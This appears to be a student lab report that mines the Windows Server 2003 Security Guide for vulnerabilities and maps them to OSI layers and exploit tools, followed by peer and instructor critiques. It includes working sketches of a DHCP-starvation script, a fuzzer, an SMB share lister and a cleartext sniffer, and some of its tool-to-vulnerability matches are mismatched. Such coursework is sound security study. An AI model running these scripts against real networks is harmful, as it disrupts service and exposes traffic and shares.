Abstract
This lab continues to build upon the previous labs. This week we discuss vulnerabilities within systems and the use of security white papers to gain information about those systems. Many of these white papers can be found at vendor sites or are provided by the National Institute of Standards and Technology. Using a variety of tools, we test whether the identified vulnerabilities can be exploited. From this information we conclude with findings about what was found within the documentation and which vulnerabilities can be exploited. In addition, two tables are presented that categorize a variety of vulnerabilities and tools against the OSI seven-layer model.
Literature Review
In previous lab exercises we have seen how penetration testers can exploit a network through both active and passive reconnaissance of their targets, using data captured or probed from the target’s network to footprint its systems. The data gathered can be used to select tools to exploit the systems based on preexisting vulnerabilities, or to select tools to discover vulnerabilities that are not yet known to exist.
In lab three we saw that exploit tools could be the source of additional security risks if they are not properly analyzed by experts, so, based on the circumstances, we may need the ability to exploit a network without any tools. Literature such as Jajodia, Noel, and O’Berry (2005) and Aycock and Barker (2005) shows that the best way to defend or attack a system is to have an intimate knowledge and understanding of the components that make up the system and, more importantly, how it is defended. Jajodia et al. describe a tool for performing a topological vulnerability analysis based on knowledge of the target system being tested. By understanding the components of the system, a tester can determine points of weakness that could be exploited. Aycock and Barker used similar logic in developing their course material for teaching a class on virus writing: by understanding the process and components of writing a virus, the students would be able to develop more effective countermeasures for defending against viruses (p. 153). As students of network penetration testing, we have developed various methods of identifying the components in a target network; in lab three we learned to do this passively. Our previous lab exercise, lab four, analyzed and tested methods of actively probing the target network to discover vulnerabilities, often involving interaction with the target hosts using tools. By applying the principle of knowing and understanding the components of our target networks through analysis of configuration and security documentation, we will be able to passively develop an exploit table. In this lab we will not use any technical tools to discover vulnerabilities in a system; we will use the vendor’s own security documentation to identify potential areas of exploitation.
Technical tools have limitations that constrain their usefulness in a penetration testing environment. The tools will often return either too many results for the tester to sort through or, worse yet, identify false positives (Wales, 2003, p. 16), which could waste precious testing time. By eliminating the use of tools altogether, or by augmenting their output with the knowledge obtained from security documentation and security guides, a tester can either filter the results from tool output or, as we see in this lab, narrow the focus of their attack efforts to the specific areas of the system that the documentation identifies as needing special attention.
In order to identify points of weakness in the system from the configuration guides and security documentation, we will need to reverse engineer the processes and steps identified in the guides. Reverse engineering is often used in software vulnerability testing, as seen in Jorgensen (2003), where the author tests how a piece of software, Adobe Acrobat, handles random incoming data streams (pp. 1-2). This process is typically used to find programming errors that lead to buffer overflows, allowing an attacker to cause the program to fail in an unexpected way and often to execute arbitrary code that could crash the system or grant remote access. Through reverse engineering of how the software handles incoming data streams, testers can often identify weak points in the system where they can inject their code to cause the desired outcome. Applying this principle to the exercises of lab five, we can identify weak points in a system’s configuration by analyzing the configuration guide and, again, narrowly focus our attack efforts on those areas. Some security guides will even point out the vulnerabilities that exist by default.
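To make the hostile-data-stream idea concrete, the following is a minimal sketch of the kind of random-mutation test Jorgensen describes: take a known-good input, flip some of its bytes, and watch how the target parser reacts. The seed file name and the target program name are placeholder assumptions on our part, not details from Jorgensen’s paper.

    # Minimal random-mutation sketch of the hostile data stream technique.
    # "seed.pdf" and "target_viewer" are placeholder assumptions; substitute
    # a known-good input and whatever parser is under test.
    import random
    import subprocess
    import tempfile

    def mutate(data: bytes, rate: float = 0.01) -> bytes:
        """Flip a small fraction of the input bytes at random."""
        out = bytearray(data)
        for i in range(len(out)):
            if random.random() < rate:
                out[i] = random.randrange(256)
        return bytes(out)

    with open("seed.pdf", "rb") as f:
        seed = f.read()

    for trial in range(100):
        with tempfile.NamedTemporaryFile(suffix=".pdf", delete=False) as tmp:
            tmp.write(mutate(seed))
            path = tmp.name
        try:
            # A non-zero return code (or a hang caught by the timeout) flags
            # a candidate input worth examining more closely.
            result = subprocess.run(["target_viewer", path], timeout=10)
            if result.returncode != 0:
                print(f"trial {trial}: abnormal exit {result.returncode} ({path})")
        except subprocess.TimeoutExpired:
            print(f"trial {trial}: hang ({path})")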
Instead of analyzing a piece of software, for this lab we will be analyzing documentation. Configuration and security guides are often provided by vendors to their customers for the purpose of configuring the system according to the vendor’s best practices. While this is useful to the vendor, which gets an ideal environment to support, the resulting system configurations can become somewhat homogenized across multiple organizations, and if the vendor’s best practices are flawed, the vendor could be exposing its customers to risk. The security guide to be analyzed in this lab is the Windows Server 2003 Security Guide. This guide documents security countermeasures and the “vulnerabilities that they address” (Microsoft, 2006, p. 2). The guide also notes the negative impact that the security countermeasures could have on the performance or usability of the system. One negative impact not mentioned by the guide is the potential risk of following a boilerplate, template-based approach to securing a system. This is exacerbated by the template files provided along with the guide for automatically applying the security settings for each of the three security levels. By providing such an easy path to “security,” many administrators may simply apply the template without any further testing or research. Administrators may also apply exactly the solution the guide recommends to mitigate a vulnerability. In doing so, they give an attacker more information: the vulnerability has been identified and dealt with in a particular, predictable way. If the attacker or tester notes that the vulnerability has been fixed in a certain way, they may be able to find another way around that strategy that is not mentioned in the security guide. An example of this type of attack is seen in Jajodia et al. (2005), where the authors show a network of two hosts protected by a firewall. The paper describes an attack in which the attacker notes that the firewall blocks access to the desired target but not to a second host. The attacker first gains control of the reachable machine and then, from behind the firewall, executes another exploit against the original target (p. 258).
The security guide does stress that the measures need to be evaluated and tested by qualified personnel to ensure that they do not affect operations in their environment. In practice, however, an organization that has taken the time to apply the security measures in the guide has probably not taken the additional time to test them or to find other methods of exploitation that the guide either missed or opened up through its countermeasures. An attacker can use this to their advantage; a tester needs to ensure that the customer is aware of this and should assist in verifying both the correctness of the countermeasures and the completeness of the guide.
Methodology
For this lab exercise we will be reverse engineering the security configuration guide for Windows Server 2003 from Microsoft. The guide consists of thirteen chapters and four appendices that focus on security countermeasures for Windows Server 2003, the vulnerabilities that they address, and the negative impacts that the countermeasures could have on the operation of the system. We will be analyzing each chapter for the vulnerabilities that are present in a standard configuration and the countermeasures proposed. The document describes countermeasures for three different levels of security: legacy client, enterprise client, and specialized security/limited functionality (SSLF). For the purposes of this exercise we will analyze the countermeasures described for the enterprise client, which gives us a good mix of security without the added inconveniences of running in SSLF mode. SSLF mode is often used for servers dedicated to a single application and severely impacts usability and performance. We will take each of the vulnerabilities found in the documentation and classify them based on the OSI layer the countermeasure is meant to protect. Based on the mitigation strategy provided in the guide, we will create a list describing each of the vulnerabilities in further detail along with the countermeasure given for the enterprise client security level.
Each vulnerability will also be classified by its McCumber cube coordinates, identifying what would be affected through exploitation of the vulnerability, what state the data is in when the vulnerability is exploited, and what method is used to exploit it (McCumber, 1991, pp. 3-7). Based on the tables of exploit tools generated in labs one, two, and three, we will analyze the vulnerabilities discovered in this lab and attempt to match them with tools classified by their OSI layer. We hope this will let us match vulnerabilities to exploit tools rather rapidly, something that would be extremely useful to an attacker or a penetration tester. Once a tool has been identified, we will run it from another system against our Windows Server 2003 virtual machine in the lab environment created in lab one. First, the tool will be run against the server with the default security configuration to test for the presence of the vulnerability. Second, we will implement the countermeasure described in the security guide and run the tool again to determine whether the proposed countermeasure sufficiently mitigates the vulnerability.
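The before-and-after comparison described above can be summarized as a simple test loop. The sketch below is only meant to show the structure of that test; run_tool and apply_countermeasure are hypothetical placeholders for the actual tool invocation and the configuration change taken from the guide, not working implementations.

    # Structural sketch of the before/after test described above. The helper
    # functions are hypothetical placeholders, not working implementations.
    from dataclasses import dataclass

    @dataclass
    class ToolResult:
        succeeded: bool

    def run_tool(tool: str, target: str) -> ToolResult:
        raise NotImplementedError("wrap the actual exploit tool invocation here")

    def apply_countermeasure(vuln: str, target: str) -> None:
        raise NotImplementedError("apply the enterprise client setting from the guide")

    def test_vulnerability(vuln: str, tool: str, target: str) -> dict:
        before = run_tool(tool, target)       # default configuration
        apply_countermeasure(vuln, target)    # countermeasure from the guide
        after = run_tool(tool, target)        # re-test once hardened
        return {
            "vulnerability": vuln,
            "exploitable_before": before.succeeded,
            "exploitable_after": after.succeeded,
            "countermeasure_effective": before.succeeded and not after.succeeded,
        }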
Findings
The summary table of the findings for the first portion of the exercises, identifying vulnerabilities from the security configuration documentation, is detailed in Figure 1. This table organizes the vulnerabilities discovered by the OSI layer that would be exploited and also provides the McCumber cube coordinates that are attacked through exploitation of the vulnerability. The majority of the vulnerabilities found were in the application and presentation layers of the OSI model.
Below is a list of the vulnerabilities identified through an analysis of the security configuration guide, a description of each, possible methods of exploitation for some, and a mitigation strategy from the guide if one was provided.
Layer 8
Guess reused password – The countermeasure for this vulnerability would be to enforce a password history (remembering the last 24 passwords, according to the security guide) and to enforce a minimum password age. A minimum password age requires a user to wait a specified amount of time, one day for enterprise clients, before changing their password so the user cannot cycle through old passwords to reuse one (Microsoft, 2006, p. 38).
Guess old password – The countermeasure for this vulnerability would be to expire the password every 42 days according to the security guide (Microsoft, 2006, p. 38).
Guess the current password – By enforcing a minimum password length and complexity requirements, it becomes more difficult to guess a user’s password or obtain it through brute-force methods (Microsoft, 2006, pp. 39-40). A quick check of these password-policy values is sketched after this layer’s list.
Obtain user names through surveillance – Even when a Windows Server 2003 machine is locked or logged off, the screen displays either the currently logged in user or the user name of the last logged in user unless restricted by a policy (Microsoft, 2006, p. 83).
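One low-effort way to verify that the password-policy countermeasures above are actually in force on a host is to read the local account policy with the built-in net accounts command. The sketch below is a minimal, assumed approach: the expected values reflect our reading of the enterprise client recommendations (24 remembered passwords, a 42-day maximum age, and an assumed minimum length of eight characters), and the exact output labels may vary by Windows version and locale.

    # Minimal sketch: compare the local account policy (via "net accounts")
    # against the enterprise client values discussed above. The expected
    # minimum length of 8 is an assumption; verify it against the guide.
    import subprocess

    EXPECTED = {
        "Length of password history maintained": "24",
        "Maximum password age (days)": "42",
        "Minimum password length": "8",
    }

    output = subprocess.run(
        ["net", "accounts"], capture_output=True, text=True, check=True
    ).stdout

    policy = {}
    for line in output.splitlines():
        if ":" in line:
            key, _, value = line.partition(":")
            policy[key.strip()] = value.strip()

    for setting, expected in EXPECTED.items():
        actual = policy.get(setting, "<not reported>")
        flag = "OK" if actual == expected else "CHECK"
        print(f"[{flag}] {setting}: {actual} (guide recommends {expected})")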
Layer 7
Analyze programs through debuggers – If not restricted, a user could attach a debugger to a process or the kernel providing complete access to the inputs and outputs (Microsoft, 2006, p. 70).
Analyze system performance – By analyzing performance statistics on the system, an attacker could identify processes that would make the best targets for a denial of service or identify anti-virus software to bypass (Microsoft, 2006, p. 74).
Autorun malicious application – An attacker could insert removable media into a running server with a logged in user and the server would automatically execute the code. To defend against this, autorun should be disabled on servers that may not have continuous physical security (Microsoft, 2006, pp. 105-106).
DHCP Denial of Service – An attacker could write a script to exhaust the DHCP pool of all available addresses, causing a denial of service for legitimate systems requesting IP addresses (Microsoft, 2006, p. 141); a minimal sketch of such a script appears after this layer’s list.
Enumerate SIDs anonymously – This setting could allow an attacker to anonymously expose the user name of the Administrator account on a member server if enabled. The policy is disabled by default on member servers but is enabled by default on domain controllers (Microsoft, 2006, pp. 45-46).
Execute malicious program from removable media – If access to local removable media is not controlled, an unprivileged user could load removable media containing malicious software that could escalate their privileges or cause a denial of service (Microsoft, 2006, p. 79).
File manipulation – By manipulating files, an attacker could compromise the integrity of the data. Through object access auditing, an administrator could see what particular files or folders are being accessed by individuals that may or may not have permissions to do so (Microsoft, 2006, pp. 58-60, 89-90).
Force logoff when logon hours expire – If disabled, this setting could allow an attacker logged in as somebody else to keep their session open indefinitely.
IIS Directory Traversal Attack – If the files for the websites served by IIS are kept on the same volume as the system files, an attacker could send a specially crafted file request for files outside of the website’s folder, potentially accessing system files (Microsoft, 2006, p. 170).
NTBackup Application Programming Interface (API) privilege abuse – The “Back up files and directories” permission circumvents file and directory permissions when they are accessed through the backup API (Microsoft, 2006, p. 68).
Pagefile manipulation – If the “Create a pagefile” setting is not locked down, an attacker could modify the size of the pagefile resulting in decreased system performance and possibly a denial of service (Microsoft, 2006, p. 69). To clear the contents of the page file to prevent access after a shut down, the system can be configured to zero out the page file at shut down. To bypass this, an attacker with physical access could remove the power from the system (p. 96).
Profile application processes – Through process profiling, an attacker could identify security software running on the server, such as anti-virus or intrusion detection software. If they identify that these are running, they could employ countermeasures to bypass them (Microsoft, 2006, p. 74).
Process resource starvation – By manipulating the amount of memory or scheduling time available to a process, an attacker could cause a denial of service against the program. By adjusting the permissions on who is allowed to “adjust memory quotas for a process,” this setting can be restricted to privileged users only (Microsoft, 2006, p. 68). The “increase scheduling priority” setting can be used to restrict the ability of users to increase the priority of their processes, which could otherwise result in a denial of service for others.
Remote access through Terminal Services – By restricting who is allowed to log in through Terminal Services, the system can be secured against administrators making changes to the system remotely. This setting is useful in environments where a terminal server needs to be exposed remotely and the administrator wants to deny accounts with administrative-level privileges the ability to log in remotely (Microsoft, 2006, p. 68).
Remote shutdown – The “Force shutdown from a remote system” right could allow any user with privileges to shut down the system to execute that task remotely, causing a denial of service (Microsoft, 2006, p. 72).
Security audit log manipulation – By generating a number of meaningless security events, an attacker could overwrite the contents of a security log if the log is set to overwrite events as needed, thus obfuscating what the attacker did. The ability to generate security audits can be controlled through the “Generate security audits” setting (Microsoft, 2006, p. 72).
System time manipulation – By manipulating the system time an attacker could obfuscate their attacks. If the system time is altered, events won’t be timestamped properly making it difficult for investigators to determine when the attacker’s activities were performed. A secondary effect of exploiting this vulnerability would be a denial of service for Kerberos tickets as they are time sensitive (Microsoft, 2006, p. 68).
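The DHCP denial of service item above mentions writing a script to exhaust the address pool; the following is a minimal sketch of that idea, intended only for the isolated lab network built in lab one. It broadcasts DHCPDISCOVER messages from randomized MAC addresses so the server offers, and briefly reserves, a new lease for each one. The scapy layers are used as we understand that library’s API, the interface name is an assumption, and a complete starvation tool would also finish the DHCP request so each lease is actually bound.

    # Sketch of DHCP pool exhaustion for the isolated lab network only.
    # Each DHCPDISCOVER comes from a different random MAC, prompting the
    # server to offer (and briefly reserve) another address from its pool.
    import random
    from scapy.all import BOOTP, DHCP, IP, UDP, Ether, RandMAC, sendp

    IFACE = "eth0"  # assumed lab interface name

    for _ in range(200):  # roughly the size of a small scope
        mac = str(RandMAC())
        pkt = (
            Ether(src=mac, dst="ff:ff:ff:ff:ff:ff")
            / IP(src="0.0.0.0", dst="255.255.255.255")
            / UDP(sport=68, dport=67)
            / BOOTP(chaddr=bytes.fromhex(mac.replace(":", "")),
                    xid=random.randint(1, 0xFFFFFFFF))
            / DHCP(options=[("message-type", "discover"), "end"])
        )
        sendp(pkt, iface=IFACE, verbose=False)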
Layer 6
Account manipulation – By creating accounts or manipulating privileges on existing accounts, an attacker could gain control over a system. By auditing account management events, both successes and failures, an administrator could be alerted to suspicious activity (Microsoft, 2006, p. 55).
Brute force current password – By attempting to log in to an account repeatedly, an exploit tool could try all possible eight-character, case-insensitive alphabetic passwords in about 59 hours at 1,000,000 attempts per second; the arithmetic behind this estimate is reproduced after this layer’s list. Account lockout drastically increases this time period by locking out the account after a set number of unsuccessful attempts and resetting the lockout status either administratively or after a set number of minutes (Microsoft, 2006, p. 42). Auditing account logon events creates an audit trail to follow, particularly failure audits, which identify accounts that may be subject to this attack (p. 54). In addition to user accounts, domain computers also have passwords that are automatically renewed periodically. If the machine account is not allowed to change its password through a policy setting, an attacker could discover this password through the methods described above and function at the level of the machine on the network (p. 81). Older versions of Windows, or current versions configured to support older versions, may have passwords stored as LAN Manager hashes, which are easier to crack (p. 93). In order to mitigate brute forcing of the default “Administrator” account, the account should be renamed to something difficult to guess. While this will make determining the account’s username more difficult, the account’s relative identifier (500) within its Security Identifier (SID) is the same across all versions of Windows and is well known, so the account can still be located by its SID (p. 133).
Decrypt the password – Windows Server 2003 contains an option, turned off by default, to store passwords using reversible encryption allowing an administrator, or attacker, to decrypt all stored passwords on the system. The guide recommends ensuring this is disabled (Microsoft, 2006, p. 41).
Obtain cached passwords from system – Unless restricted, a Windows machine caches the credentials of users who have logged in previously. Even if a machine is taken offsite, these credentials are subject to decryption or discovery through brute-force methods (Microsoft, 2006, p. 84). To restrict the ability of machines taken offsite to be unlocked, the “Require domain controller authentication to unlock workstation” setting can be enforced (p. 84).
Privilege escalation or password bypass through physical access – By restricting who is allowed to log in locally at the console, a system could be secured against someone who has direct physical access (Microsoft, 2006, p. 68).
Privilege escalation through assuming another user’s identity – The “Act as part of the operating system” setting in Windows Server 2003 allows a process to assume a user’s identity; if that user is privileged, the process could operate at that user’s permission level and alter system settings (Microsoft, 2006, p. 67).
Privilege escalation through object creation – By not restricting the ability to create token, global, or permanent shared objects in the system, an attacker with any level of access could gain access to all local resources, access other sessions, or share out system resources (Microsoft, 2006, pp. 69-70).
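The 59-hour estimate in the brute-force item above is easy to reproduce. The short calculation below shows that the figure corresponds to an eight-character, case-insensitive alphabetic (26-character) keyspace at 1,000,000 guesses per second, and how sharply the time grows as the character set expands; the particular character-set choices shown are ours, not the guide’s.

    # Back-of-the-envelope brute-force times for 8-character passwords at
    # 1,000,000 guesses per second; 26 characters reproduces roughly 59 hours.
    RATE = 1_000_000   # guesses per second
    LENGTH = 8

    for name, charset in [("lowercase alphabetic", 26),
                          ("alphanumeric", 36),
                          ("mixed case + digits", 62)]:
        seconds = charset ** LENGTH / RATE
        print(f"{name:>22}: {seconds / 3600:12,.1f} hours "
              f"({seconds / 86400:10,.1f} days)")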
Layer 5
Access SMB/CIFS shares over the network – By default in Windows Server 2003, the Everyone group has access to SMB shares. While this does not include anonymous users or guest accounts, anyone with an account on the system, even an unprivileged one, can see the shares (Microsoft, 2006, p. 67); a minimal share-listing sketch appears after this layer’s list.
SMB Session Hijacking – If an attacker hijacks the SMB session of a user whose access is restricted by logon hours and this setting is not enabled, the attacker could keep the hijacked session open indefinitely (Microsoft, 2006, p. 45).
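To illustrate the share-access item above, the sketch below lists the shares visible to any authenticated, unprivileged account. Our testing used the SMB4K graphical browser; this sketch instead uses the impacket Python library as we understand its API, and the target address and credentials are placeholder assumptions.

    # Minimal sketch: list SMB shares visible to a low-privilege account.
    # Target address and credentials are placeholder assumptions.
    from impacket.smbconnection import SMBConnection

    TARGET = "192.168.1.10"                    # assumed lab Server 2003 VM
    USER, PASSWORD = "labuser", "labpassword"  # any unprivileged account

    conn = SMBConnection(TARGET, TARGET)
    conn.login(USER, PASSWORD)
    for share in conn.listShares():
        print(share["shi1_netname"][:-1])      # trim the trailing NUL
    conn.logoff()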
Layer 4
TCP Denial of Service – Windows Server 2003 contains registry keys that assist in defending against a SYN flood attack but that are not enabled by default: TcpMaxConnectResponseRetransmissions and SynAttackProtect (Microsoft, 2006, p. 103). Applying them is sketched below.
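A minimal sketch of applying the two registry values named above follows. It uses Python’s standard winreg module, must be run with administrative rights on the server itself, and the DWORD values shown (SynAttackProtect=1, TcpMaxConnectResponseRetransmissions=2) reflect our reading of the guide and should be verified against it before use.

    # Sketch: enable the SYN flood hardening values discussed above.
    # Run locally with administrative rights; verify values against the guide.
    import winreg

    TCPIP_PARAMS = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, TCPIP_PARAMS, 0,
                        winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, "SynAttackProtect", 0, winreg.REG_DWORD, 1)
        winreg.SetValueEx(key, "TcpMaxConnectResponseRetransmissions", 0,
                          winreg.REG_DWORD, 2)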
Layer 3
Monitor unencrypted network communications – By default all network communications are unencrypted and subject to monitoring through active or passive reconnaissance methods discussed in labs two and three. Settings and policies can be applied to enable encryption when requested or require encryption for all network communications (Microsoft, 2006, pp. 80-81).
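The following sketch illustrates the kind of passive monitoring described above by printing readable payload bytes captured from a few protocols that commonly run in cleartext (FTP, telnet, HTTP). It uses the scapy library; the interface name and port filter are assumptions, and it is only meaningful on the isolated lab network.

    # Passive capture sketch: print readable TCP payloads from cleartext
    # protocols on the lab network. Interface and filter are assumptions.
    from scapy.all import IP, Raw, TCP, sniff

    def show_cleartext(pkt):
        if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
            text = pkt[Raw].load.decode("ascii", errors="replace").strip()
            if text:
                print(f"{pkt[IP].src} -> {pkt[IP].dst}: {text[:80]!r}")

    sniff(iface="eth0",
          filter="tcp port 21 or tcp port 23 or tcp port 80",
          prn=show_cleartext, store=False)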
Layer 2
Delete system volumes or partitions – Volume maintenance tasks should only be run by administrators; if this right were granted to non-administrators, they could cause a denial of service (Microsoft, 2006, p. 74).
Load malicious drivers – System drivers run at a very high privilege level. If a user loads a driver containing malicious code, the system could be compromised. Restricting who can load drivers reduces the number of users who could potentially compromise the system (Microsoft, 2006, pp. 72-73). This vulnerability can be further controlled by requiring that even those with permission to install drivers load only digitally signed drivers (p. 79).
Layer 1
Shut down the system – The ability of logged-in users to shut down the system can be controlled through settings. Physical access to the server also needs to be strictly controlled; anyone with access to the system could shut it down, resulting in a denial of service (Microsoft, 2006, p. 74).
In Figure 2 we analyzed the vulnerabilities discovered and matched them with corresponding exploit tools from labs one, two, and three that we believed would exploit each vulnerability. Using various tools from within BackTrack, we were able to test some of the vulnerabilities found in Windows Server 2003. Without hardening, the system can be attacked with these tools. Using John the Ripper, the person running the program can recover user and password information, which can then be used in further attacks that require a username and password for the system. Using SMB4K, we were able to gain access to the Windows Server 2003 machine; it scanned the network for shares and allowed us to view files on the server. Using this tool against a Windows XP host did not produce the same result because the host firewall denied access. This shows that if an attacker needs information to run an attack, they can run additional, preparatory attacks to gain the required information.
Issues
Our initial approach to analyzing the guide was to split it up by chapter to distribute the workload between the team members. After the first night of work we determined that the bulk of the security guidance was found in the earlier chapters of the document. Good communication was a key factor in figuring this out early, and we learned not to treat these guides as simple ordered lists.
Conclusion
This lab was an eye opener. As IT practitioners we often refer to these guides for information on configuring a system or for implementing a particular security control. The literature review and our reverse engineering of the guide showed us how quickly vulnerabilities can be identified from security documentation, and how these guides are a risk in themselves: by promoting a standard security configuration, suggesting how to choose passwords, or providing pre-configured security template files, they homogenize the security of not just the systems in one organization but potentially of many organizations utilizing the operating system, software, or hardware described in the guide. Through our analysis of the guide we chose, we were quickly able to identify vulnerabilities in the system and choose methods for exploitation. The research also pointed out that by relying solely on a document such as this, a responsible system administrator or penetration tester still needs to ensure the completeness of what the guide covers and the correctness of the countermeasures employed. Security guides are only that: guides. While they are a good start, they are not a “one stop shop” for implementing security in a system.
Figure 1
OSI Layer | Vulnerability | McCumber Coordinates
Layer 8 – People | Guess reused password, guess old password, guess the current password, obtain user names through surveillance | Confidentiality, Storage, People
Layer 7 – Application | Autorun malicious application, enumerate SIDs, execute malicious program from removable media, force logoff when logon hours expire, IIS directory traversal attack, NTBackup API privilege abuse, pagefile manipulation, remote access through Terminal Services | Confidentiality, Storage, Technology
Layer 7 – Application | Analyze programs through debuggers, analyze system performance, profile application processes | Confidentiality, Processing, Technology
Layer 7 – Application | File manipulation, system time manipulation, security audit log manipulation | Integrity, Storage, Technology
Layer 7 – Application | Process resource starvation, remote shutdown | Availability, Processing, Technology
Layer 7 – Application | DHCP denial of service | Availability, Transmission, Technology
Layer 6 – Presentation | Account manipulation, brute force current password, decrypt the password, obtain cached passwords from system, privilege escalation or password bypass through physical access, privilege escalation through object creation | Confidentiality, Storage, Technology
Layer 6 – Presentation | Privilege escalation through assuming another user’s identity | Confidentiality, Processing, Technology
Layer 5 – Session | Access SMB/CIFS shares over the network, SMB session hijacking | Confidentiality, Storage, Technology
Layer 4 – Transport | TCP denial of service | Availability, Transmission, Technology
Layer 3 – Network | Monitor unencrypted network communications | Confidentiality, Transmission, Technology
Layer 2 – Data Link | Load malicious drivers | Confidentiality, Storage, Technology
Layer 2 – Data Link | Delete system volumes or partitions | Availability, Storage, Technology
Layer 1 – Physical | Shut down the system | Availability, Processing, Technology
Figure 2
OSI Layer | Vulnerability | Exploit Tool
Layer 8 – People | Guess/discover old password | L0phtCrack, John the Ripper
Layer 7 – Application | Enumerate SIDs | Oracle SID enumeration
Layer 6 – Presentation | Brute force current password | L0phtCrack, John the Ripper
Layer 5 – Session | SMB session hijacking | SMB4K
Layer 4 – Transport | TCP denial of service | tcptraceroute
Layer 3 – Network | Gather unencrypted data | Wireshark
Layer 2 – Data Link | Load malicious drivers/updates | btscanner
Layer 1 – Physical | Intercept transmissions between networks at the fiber or Ethernet cables/connections | wiretap
Works Cited
Aycock, J., & Barker, K. (2005). Viruses 101. In Proceedings of the 36th SIGCSE Technical Symposium on Computer Science Education.
Jajodia, S., Noel, S., & O’Berry, B. (2005). Topological Analysis of Network Attack Vulnerability. In Managing Cyber Threats (pp. 247-266).
Jorgensen, A. A. (2003). Testing with Hostile Data Streams. SIGSOFT Software Engineering Notes, 28(2), 9.
McCumber, J. R. (1991, October). Information Systems Security: A Comprehensive Model. Paper presented at the 14th National Computer Security Conference.
Microsoft. (2006). Windows Server 2003 Security Guide. Retrieved July 6, 2009, from http://checklists.nist.gov/chklst_detail.cfm?config_id=71
Wales, E. (2003). Vulnerability Assessment Tools. Network Security, 2003, 15-17.
This abstract has a very weak beginning. It mentions that the lab builds on the other labs, but does not explain how. The rest of the abstract is devoted to talking about how either vendor white papers or NIST documents could be used to gain information about a system. They also mention that they will be examining tools that can be used to exploit the vulnerabilities uncovered by reverse engineering the documents described above. This group, and others, failed to mention that part of the lab is examining security patches and service packs. I believe that the lab was talking about finding tools to exploit the vulnerabilities that the security patches and service packs were trying to fix.
The group starts their literature review off by providing a good explanation of how this lab ties into the rest of the course. This section could have easily been included in the abstract to help explain this lab. The group does a very good job of explaining the purpose of this lab in the literature review using all the articles given in this lab. The group does not explain each of the articles individually very well, though. They do a great job of explaining how each article relates to the current lab, but they do not explain anything about the methodology, theme, or research done in the articles. I like how the group had a very good idea behind this lab and the articles involved, but they could have added some of each article's details to make the literature review complete.
The first part of this group’s methodology described the document that they were going to use in this lab. They mention that they are going to examine this document from the enterprise client view instead of either the legacy client or the specialized security/limited functionality level. Next in the methodology the group steps through how they are going to accomplish each of the tasks given in the lab. As mentioned above, this group missed the section examining the security patches and service packs applied to the operating systems and the tools that could be used to exploit the vulnerabilities that the patches and service packs fix. The group could have gone into more detail on how they classified each of the vulnerabilities in the document.
In the findings of the lab the group starts off by explaining the table that was developed from the examination of the chosen document. The group briefly explains the patterns they found in creating the table. The next part of the results shows a breakdown of all the vulnerabilities found in the document, possible methods of exploitation for some, and a mitigation strategy from the document. At the end of the results the group discusses the tools they found that could be matched up to each of the vulnerabilities found in the first part of the lab, and briefly discusses some of the results of testing with these tools. When I examined the table that was created I was disappointed. The table did not show a complete list of vulnerabilities. This list could have included any security policies that were changed when hardening a computer along with many more vulnerabilities. The group could have examined securing a system better and included a lot more. This also pertains to the table with the tools in it.
The group then explains that they had issues with trying to split up the work between them. They found out this did not work as well as they planned. The group does do a very nice job of concluding the lab. They talk about what they learned by doing this lab.
They mentioned that the documents used to secure a system could be used to find weaknesses in another. They make a very good point in the end that these security documents are just guides and should not be looked at as a “one stop shop” for implementing security in a system.
Team five’s report was fairly solid, but suffered from an awkward abstract and missing details. In the end, I’m not sure if they got the full benefit of either the experiment itself or the assigned literature.
The group’s abstract is so full of grammatical errors that I stopped reading this lab and came back to it after reading another. It’s puzzling since this problem does not persist into the remainder of the document. Please proofread everything.
The team stretches hard and far in order to relate the literature back to the lab. In the process of doing so, they make some erroneous statements. I see what you’re saying about Jajodia et al. but you’re reaching when you say Aycock and Barker talk about defense of a system. In fact, part of what they teach is the opposite. They teach the malicious code in order to teach defense against it, hence the controversy. I’m not certain that what Jorgensen did can be classified as reverse engineering, strictly speaking. It looked more like data injection to me. I would rather see more discussion of the content of the article, and evaluation of its worth. What is Wales really talking about? What does the motivation appear to be? Is there value to Aycock and Barker’s controversial course content? What is Jorgensen doing? Does it stand up to academic evaluation? Is there something wrong with Jajodia et al.’s methodology? By the way, you missed an article.
The team’s methods section is complete. A bit more detail would have helped make it even clearer. What does the test environment look like? How will you test the tools? How do you know which OSI layer to use?
Your findings appear to be thorough. Why do you think that the majority of the vulnerabilities are found in the sixth and seventh layers? Was this expected? Your proof-of-concept tests were weak. Be as specific as possible. What actually happened? There really needs to be a separate description of each test, the procedure, and the results. What about updates and security roll-ups? How do they affect the system? Are they good for the attacker, the defender, or both?
In the conclusion, the team states that the literature review demonstrated to them that security guides are a risk. I’m not sure how you got that from the literature. While I agree that a security guide should never be followed blindly, and that IT professionals should use ample measures of caution and common sense to build resiliency into a system, I think there may even be something better in this lab. What is the value of the security guide to the penetration tester? The group discusses reverse engineering earlier in the document. What is the value in doing so with the security documents?
The first issue with this lab report is the wording in the abstract, for example the first sentence: “Within this lab it continues to build upon the previous labs, and this week we discuss on vulnerabilities within systems and using security white pages to gain information about systems”. The wording in the abstract made it very hard to read and to understand exactly what they were trying to convey. The team had a nice little introduction paragraph in their abstract, tying in the previous lab experiments. This is good because it shows that they understand that each lab builds on the previous ones. It was interesting that this team is the only team to incorporate their security document into their literature review. The team does a decent job of making a cohesive literature review and making everything flow together. Unfortunately, not all of the required questions were answered. Their literature review was much longer than last week’s, putting it over the required length. In the last paragraph the team talks about how making the changes in the security document is a necessary step to take. Are we ever really secure after updating and patching? Or do we get to a point of security in our operating system and then, bam, a new OS comes out and we have to start the entire process again? I would like a team to have talked about the redundancy in what we do with our operating systems. I feel that it is a continuous circle: we patch to fix problems, more problems are then found, then we patch again, and it just doesn’t ever end.
This team, like many others, uses the future tense in their methodology section. By the time the methodology section is written, the lab should have already been done; it is in the past. In order for someone to duplicate the experiment performed by the team, the team should write about what they did and anything that changed during the process, not what they will do. The team does mention where most of the vulnerabilities are found in the OSI seven-layer model, or at least, in their opinion, where they are found, but never goes into detail as to why this pattern occurs. This team had the shortest tables of any of the other groups. What does this mean? Was their document of choice not long enough, or did they omit many items because of what the changes were and decide that they were not needed? More discussion is needed in their findings to explain their results. This team was one of the few teams that actually looked up the year that their articles were published, instead of putting n.d. This team was the only one that, after stating their issues, explained what they did to resolve them. Good job on doing that. Overall, the team needs more cohesion; after reading five lab reports from them, it is still obvious that different people wrote different parts of the lab report.
